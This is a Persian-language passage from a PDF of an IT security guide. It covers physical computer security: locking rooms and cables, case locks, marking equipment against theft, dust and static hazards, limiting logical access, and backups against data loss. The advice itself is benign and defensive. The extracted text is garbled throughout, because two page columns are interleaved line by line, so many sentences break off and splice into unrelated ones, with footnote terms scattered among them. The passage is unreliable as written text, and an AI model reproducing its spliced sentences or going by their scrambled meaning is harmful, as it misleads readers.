‫ﺟﻨﺒﻪ ﻫﺎﻱ ﻓﻨﻲ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺰﺭﮔﺘـﺮ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﺩﻭ ﺭﺍﻫﻜﺎﺭ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺩﺯﺩﻱ ﺭﺍﻳﺎﻧـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ :‬ﻛـﺎﺭﻱ‬
‫ﺣﺮﻓـﻪﺍﻱ ﺩﺭ ﺑﺨـﺶ ﭘــﻨﺠﻢ ﺍﺭﺍﺋــﻪ ﺷــﺪﻩ ﺍﺳــﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺑــﺎ‬
‫ﻛﻨﻴﺪ ﻛﻪ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﺩﺷﻮﺍﺭ ﺷﻮﺩ؛ ﻭ ﻳﺎ ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﻣﻴﻞ ﺑﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺎ ﻛﻠﻴﺎﺕ ﻣﻮﺿﻮﻉ ﺁﺷﻨﺎ ﺷـﺪﻳﺪ‪،‬‬
‫ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻫﺶ ﻳﺎﺑﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟﺐ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺩﺭ ﺑﺨﺶ ﭘﻨﺠﻢ )ﺍﻣﻨﻴﺖ‬

‫ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﺩﺷﻮﺍﺭ ﺷﻮﺩ‬ ‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ( ﺑﺮ ﺩﺍﻧﺶ ﻓﻨﻲ ﺧﻮﺩ ﺑﻴﺎﻓﺰﺍﻳﻴﺪ‪.‬‬

‫ﭼﻨﺪ ﺭﺍﻩ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭ ﻛﺮﺩﻥ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬ ‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻣﺤﻞ ﻧﮕﻬـﺪﺍﺭﻱ ﺭﺍﻳﺎﻧـﻪ ﺍﻣـﻦ‬ ‫•‬ ‫ﺍﻭﻟﻴﻦ ﻣﺮﺣﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﺍﺯ‬
‫ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﺍﺯ ﺁﻥ ﺩﺭ ﻳـﻚ ﺍﺗـﺎﻕ‬ ‫ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺴﺘﻪ ﺑـﻪ‬
‫ﻗﻔﻠﺪﺍﺭ ﻧﮕﻬﺪﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ ﻭ ﻳﺎ ﺍﮔﺮ ﺩﺭ ﻣﺤﻞ ﻛـﺎﺭ ﺧـﻮﺩ ﺑـﺎ‬ ‫ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻛﺠـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩﺍﻳـﺪ ﻳـﺎ ﺍﻳﻨﻜـﻪ ﺭﺍﻳﺎﻧـﻪ ﻭ‬
‫ﻫﻤﻜﺎﺭﺍﻥ ﺩﻳﮕﺮﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺭ ﻣﻌﺮﺽ ﺩﻳـﺪ‬ ‫ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﭼﻪ ﺣﺴﺎﺳﻴﺘﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ ﻳﻚ ﻗﺴﻤﺖ ﺟﺰﺋﻲ ﻳﺎ‬
‫ﺁﻧﺎﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﺤﺎﻓﻞ ﻋﻤﻮﻣﻲ ﻣﺎﻧﻨـﺪ‬ ‫ﻳﻚ ﻗﺴﻤﺖ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻣﺤﺴﻮﺏ ﺷﻮﺩ‪.‬‬
‫ﻓﺮﻭﺩﮔﺎﻩﻫﺎ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﺭﻫﺎ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺯﻣـﺎﻥ ﻋـﺪﻡ ﺣـﻀﻮﺭ ﺷـﻤﺎ ﺩﺭ‬ ‫•‬
‫ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺷﺨـﺼﻲ ﺷـﺒﺎﻧﻪ ﻭﺍﺭﺩ ﺍﺗـﺎﻕ‬
‫‪13‬‬ ‫‪Rule-Based Approach‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٥٦‬‬

‫ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺸﺨـﺼﺎﺕ ﺧـﻮﺩ ﺭﺍ‬ ‫ﺷﺪﻩ ﻭ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒـﺮﺩ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺁﮊﻳـﺮ ﺧﻄـﺮ‬
‫ﺑﺎ ﻋﻼﺋﻢ ﺛﺎﺑﺖ ﻭ ﻣﺎﻧﺪﮔﺎﺭ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩ ﺑﺮ ﺑﺪﻧﺔ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪ ﺣﻚ ﻭ ﻳﺎ ﻧﻘﺎﺷﻲ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﺗﻮﺍﻧـﺪ ﺷـﺎﻣﻞ‬ ‫ﺟﻬﺖ ﺍﻳﺠﺎﺩ ﺍﻳﻤﻨﻲ‪ ،‬ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺑﻞ ﺳﻴﻤﻲ ﻭ‬ ‫•‬
‫ﺍﺳﻢ ﻳﺎ ﻣﺸﺨﺼﺎﺕ ﺩﻳﮕﺮ ﺑﺎﺷﺪ‪ .‬ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺍﺯ ﺍﻳـﻦ‬ ‫ﻳﺎ ﺯﻧﺠﻴﺮ ﺑﻪ ﻣﻴﻠﻪ‪ ،‬ﻟﻮﻟﻪ ﻳﺎ ﺍﺷﻴﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴـﺖ ﺟﺎﺑﺠـﺎﻳﻲ‬
‫ﻧﻮﻉ ﻋﻼﻣﺘﻬﺎ ﺩﺭ ﻗـﺴﻤﺖ ﺷـﻜﺎﻑ ﺗﻬﻮﻳـﻪ ﻳـﺎ ﺷـﻜﺎﻓﻬﺎﻱ ﺩﻳﮕـﺮ‬ ‫ﻧﺪﺍﺭﻧﺪ ﻣﺘـﺼﻞ ﻛﻨﻴـﺪ‪ .‬ﺍﺯ ﺍﻳـﻦ ﺭﻭﺵ ﺩﺭ ﻣﺤﺎﻓـﻞ ﻧـﺴﺒﺘﹰﺎ‬
‫ﺍﺳــﺘﻔﺎﺩﻩ ﻧﻨﻤﺎﻳﻴــﺪ‪ .‬ﻫﻤﭽﻨــﻴﻦ ﺁﮔــﺎﻩ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ‬ ‫ﻋﻤﻮﻣﻲ ﻣﺜﻞ ﻣﺪﺍﺭﺱ ﻭ ﻳﺎ ﻛﺘﺎﺑﺨﺎﻧﻪ ﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ‪.‬‬
‫ﻋﻼﻣﺘﮕﺬﺍﺭﻱ ﺭﻭﻱ ﺑﺪﻧﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﺑﻄﺎﻝ ﺿﻤﺎﻧﺘﻨﺎﻣﻪ ﮔﺮﺩﺩ‪.‬‬ ‫ﺍﻛﺜﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺍﺭﺍﻱ ﻣﺤﻠﻲ ﻣﺨﺼﻮﺹ ﺍﺗﺼﺎﻝ ﻣﻲﺑﺎﺷـﻨﺪ‪.‬‬
‫ﻻ ﺩﺍﺭﺍﻱ ﻛﺎﺑﻠﻬﺎ ﻭ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻧﺪ‬
‫ﻗﻔﻠﻬﺎﻱ ﺑﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﺴﺒﺖ ﺑـﻪ ﮔـﺮﺩ ﻭ ﺧـﺎﻙ ﻭ ﺳـﻄﻮﺡ ﻧـﺎﻫﻤﻮﺍﺭ ﺣـﺴﺎﺱ‬
‫ﭼﻨﺎﻧﭽﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺍﺭﺍﻱ ﻗﻔﻠﻲ ﻣـﻲﺑﺎﺷـﺪ ﻛـﻪ ﺍﺯ ﺑـﺎﺯ ﺷـﺪﻥ‬ ‫•‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﻛﺎﺭﻛﺮﺩﻥ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻣﺤﻠﻲ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ ﻛـﻪ‬
‫ﺑﺪﻧﻪ‪ ١٤‬ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲ ﻛﻨﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻣﻲﺗﻮﺍﻥ‬
‫ﮔﺮﺩ ﻭ ﺧﺎﻙ ﺩﺭ ﺁﻧﺠﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﺮﺗﺒﹰﺎ ﺑﺎﻳﺪ ﺑـﺎ ﺩﻗـﺖ ﺯﻳـﺎﺩ ﺁﻧـﺮﺍ‬
‫ﺍﺯ ﭘﻴﭽﻬﺎﻱ ﻣﺨـﺼﻮﺹ ﻛـﻪ ﺑﺮﺍﺣﺘـﻲ ﻗﺎﺑـﻞ ﺑـﺎﺯ ﻛـﺮﺩﻥ‬
‫ﺗﻤﻴﺰ ﻛﺮﺩ ﺗﺎ ﺷـﻜﺎﻑ ﺗﻬﻮﻳـﻪ ﻣـﺴﺪﻭﺩ ﻧـﺸﻮﺩ‪ .‬ﺑﺮﺧـﻲ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‬
‫ﻧﻴﺴﺘﻨﺪ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﻧﺴﺒﺖ ﺑﻪ ﻓﺮﻭﺭﻓﺘﮕﻴﻬـﺎ ﻭ ﺑﺮﺁﻣـﺪﮔﻴﻬﺎﻱ ﺳـﻄﺤﻲ ﻛـﻪ‬
‫ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻧﻴﺰ ﺣﺴﺎﺱ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬ ‫ﭼﻨﺎﻧﭽﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺭﺯﺷـﻤﻨﺪﻱ )ﻣﺜـﻞ ﺩﺍﺩﻩﻫـﺎﻱ ﻛـﺎﺭﻱ ﻳـﺎ‬ ‫•‬
‫ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ( ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻻﺯﻡ ﺍﺳـﺖ‬
‫ﺟﻨﺒﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‬ ‫ﺯﻣﺎﻧﻲ ﻛﻪ ﺁﻧﺮﺍ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒـﺖ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻭ ﻳـﺎ ﺍﺯ ﺁﻥ ﺩﻭﺭ‬
‫ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺑﺮﺍﻱ ﻧﺼﺐ ﻳﻚ ﻗﻄﻌﻪ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺑﺪﻧـﺔ ﺭﺍﻳﺎﻧـﻪ‬ ‫ﻫﺴﺘﻴﺪ )ﻣﺜ ﹰﻼ ﺍﮔﺮ ﺍﺯ ﻫﺘﻞ ﺧﺎﺭﺝ ﻣﻲﺷﻮﻳﺪ ﻭ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﺗﺎﻕ ﺍﺳـﺖ(‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺎﺯ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺎﻳﺪ ﺑﻪ ﺍﺧﻄﺎﺭﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭﺑـﺎﺭﺓ ﺷـﻮﻛﻬﺎﻱ‬ ‫ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ‪ ١٥‬ﺑﻪ ﺁﻧﺮﺍ ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﻛـﺎﻫﺶ‬
‫ﺍﻟﻜﺘﺮﻭﺍﺳﺘﺎﺗﻴﻚ ﺩﺍﺩﻩ ﺷﺪﻩ ﺗﻮﺟﻪ ﻛﻨﻴﺪ )ﺷﻮﻙ ﺍﻟﻜﺘﺮﻭﺍﺳﺘﺎﺗﻴﻚ ﺑﺎﻋـﺚ‬ ‫ﺩﻫﻴﺪ‪ .‬ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ ﺑـﻪ ﻣﻌﻨـﺎﻱ ﺍﺳـﺘﻔﺎﺩﺓ ﻭﺍﻗﻌـﻲ ﺍﺯ‬
‫ﺻﺪﻣﻪﺩﻳﺪﻥ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣﻲﺷﻮﺩ ﻭ ﺑﺎﻳﺪ ﺍﺯ ﻭﻗﻮﻉ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ(‪ .‬ﺿﻤﻨﹰﺎ‬ ‫ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜـﻲ ﺑـﻪ‬
‫ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﺮﻕﮔﺮﻓﺘﮕﻲ ﻻﺯﻡ ﺍﺳﺖ ﺑـﺪﻥ‬ ‫ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻣـﺴﺘﺤﻜﻢ ﻭ‬
‫ﺷﻤﺎ ﺑﺎ ﺯﻣﻴﻦ ﺩﺭ ﺗﻤﺎﺱ ﺩﺍﺋﻢ ﺑﺎﺷﺪ‪.‬‬ ‫ﻣﺤﺎﻓﻈﻬﺎﻱ ﺻﻔﺤﻪﻧﻤـﺎﻳﺶ ﻣﺠﻬـﺰ ﺑـﻪ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ‬
‫ﮔﺰﻳﻨﻪﻫﺎﻱ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺷـﺮﻭﻉ ﺍﻳـﻦ ﻧـﻮﻉ ﺍﺯ ﺣﻔﺎﻇـﺖ‬
‫ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ‬ ‫ﻫﺴﺘﻨﺪ )ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺑﺤﺚ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺠﻮﺯ ﻭﺭﻭﺩ ﺩﺭ‬
‫ﻫﻤﻴﻦ ﻓﺼﻞ ﺭﺟﻮﻉ ﻛﻨﻴﺪ(‪.‬‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ‪ ١٧‬ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻭ ‪PDA‬ﻫﺎ‪ ١٦‬ﻛﻮﭼﻚ ﻣﻲﺑﺎﺷـﻨﺪ ﻭ ﺑـﻪ‬ ‫•‬
‫ﺩﺭ ﻗﺴﻤﺖ ﻗﺒﻞ ﻣﻄﺎﻟﺒﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺁﻣـﺪ‪ .‬ﺩﺭ‬
‫ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺯﺩﻳﺪﻥ ﺁﻧﻬﺎ ﺁﺳﺎﻥ ﺍﺳـﺖ‪ .‬ﭼﻨﺎﻧﭽـﻪ ﺍﺯ ﺁﻧﻬـﺎ‬
‫ﺍﻳﻦ ﻗﺴﻤﺖ ﻣﻮﺍﺭﺩﻱ ﺷﺮﺡ ﺩﺍﺩﻩ ﺧﻮﺍﻫﻨﺪ ﺷـﺪ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﺯﻳﺎﺩﻱ ﻧﻤﻲﻛﻨﻴـﺪ ﺣﺘﻤـﹰﺎ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺯ ﻣﺤـﻴﻂ ﻛـﺎﺭ‬
‫ﻣﻲﺗﻮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﺮﺩ ﻛﻪ ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﺣﻔﺎﻇﺖ‬
‫ﺧﺎﺭﺝ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻛﺎﻣﻞ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﺷﻤﺎ ﭼﮕﻮﻧﻪ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ؟‬ ‫ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﻣﻴﻞ ﺑﻪ ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻫﺶ ﻳﺎﺑﺪ‬
‫ﺑﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﻧﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﺎﻳﻞ ﺑﻪ ﺧﺮﻳﺪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﺳـﺖ ﺩﻭﻡ ﺑﺎﺷـﻨﺪ ﺑـﺴﻴﺎﺭ‬
‫ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺍﻧﺪﻙ ﻫﺴﺘﻨﺪ‪ ،‬ﺧﺼﻮﺻﹰﺎ ﺍﮔﺮ ﻣـﺸﺨﺺ ﺑﺎﺷـﺪ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ ﺩﺯﺩﻱ‬
‫ﭘﺎﻙ ﺷﺪﻥ ﺍﺗﻔﺎﻗﻲ ﻓﺎﻳﻞ؛‬ ‫•‬ ‫ﺍﺳﺖ‪ .‬ﺑﻬﺘﺮﻳﻦ ﻭ ﺍﺭﺯﺍﻧﺘﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺳﺎﺭﻗﺎﻥ ﺗﻤﺎﻳﻠﻲ ﺑﻪ‬
‫ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪ؛‬ ‫•‬
‫‪14‬‬ ‫‪Case‬‬
‫‪15‬‬ ‫‪Logical Access‬‬
‫‪17‬‬ ‫‪Backups‬‬ ‫‪16‬‬ ‫‪Personal Digital Assistants‬‬
‫‪٥٧‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻧﻤﻲﺩﻫﻴﺪ ﻭ ﺩﺭ ﺍﻛﺜﺮ ﻣﻮﺍﻗﻊ ﻣﻲﺗﻮﺍﻧﻴـﺪ‬ ‫ﺫﺧﻴﺮﺓ ﻧﺎﺧﻮﺍﺳﺘﻪ ﻳﻚ ﻓﺎﻳﻞ ﺑﺮ ﺭﻭﻱ ﻓﺎﻳﻞ ﺩﻳﮕﺮ؛‬ ‫•‬
‫ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩﻩ ﻭ ﺑﻪ ﻳﻚ ﺣﺎﻟﺖ ﻣﺘﻌﺎﺩﻝ ﻭ ﻣﺎﻧﺪﮔﺎﺭ‬ ‫ﺭﻭﻧﺪ ﻧﺎﺩﺭﺳﺖ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻥ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ‬ ‫•‬
‫ﺑﺮﺳﺎﻧﻴﺪ‪ .‬ﺣﺘﻲ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺗﻤﺎﻣﹰﺎ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘـﻪ‬ ‫ﺑﺎﻋﺚ ﺗﻐﻴﻴﺮ ﻳﺎ ﭘﺎﻙ ﺷﺪﻥ ﺩﺍﺩﻩﻫﺎ ﺷﻮﺩ؛‬
‫ﺑﺎﺷﺪ‪ ،‬ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻛﺎﻣﻞ ﺍﺯ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺩﺭ‬ ‫ﻭﺟﻮﺩ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ )ﻣﺜﻞ ﻭﻳﺮﻭﺱ( ﻛﻪ ﺑﺎﻋﺚ ﺗﻐﻴﻴـﺮ‪،‬‬ ‫•‬
‫ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴﺪ ﺑـﻮﺩ ﻫﻤـﺔ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﻭﻱ‬ ‫ﺑﺎﺯﻧﻮﻳﺴﻲ ﻭ ﻳﺎ ﺣﺬﻑ ﺩﺍﺩﻩﻫﺎ ﺷﻮﺩ؛‬
‫ﺭﺍﻳﺎﻧﺔ ﺟﺪﻳﺪ ﺑﺎﺯﻳﺎﺑﻲ ﻛﻨﻴﺪ ﻭ ﻣﺠﺪﺩﹰﺍ ﺑـﻪ ﺁﻧﻬـﺎ ﺩﺳﺘﺮﺳـﻲ ﺩﺍﺷـﺘﻪ‬ ‫‪١٨‬‬
‫ﺑﺮﻭﺯ ﻣﺸﻜﻞ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ )ﻣﺜﻞ ﻣﺸﻜﻼﺕ ﺩﻳﺴﻚ ﺳﺨﺖ ‪،‬‬ ‫•‬
‫ﺑﺎﺷــﻴﺪ‪ .‬ﺍﻟﺒﺘــﻪ ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ ﺻــﺮﻓﹰﺎ ﺯﻣــﺎﻧﻲ ﻛﺎﺭﺁﻣــﺪ ﺍﺳــﺖ ﻛــﻪ‬ ‫ﺩﻳﺴﻚﮔﺮﺩﺍﻥ‪ ،‬ﭘﺮﺩﺍﺯﺷﮕﺮ ﻭ ﻳﺎ ﻣﻨﺒﻊ ﺗﻐﺬﻳﻪ( ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎﻋـﺚ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺟﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻗﺮﺑﺎﻧﻲ ﺫﺧﻴﺮﻩ ﺷـﺪﻩ‬ ‫ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﮔﺮﺩﺩ؛‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﺁﺗﺶﺳﻮﺯﻱ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﺏ ﺑﺮﺍﻱ ﺧﺎﻣﻮﺵ ﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﺔ‬ ‫•‬


‫ﺳــﻮﺧﺘﻪ‪ ،‬ﻛــﻪ ﺑﺎﻋــﺚ ﻏﻴﺮﻗﺎﺑــﻞ ﺑﺎﺯﻳــﺎﺑﻲ ﺷــﺪﻥ ﺩﺍﺩﻩﻫــﺎ‬
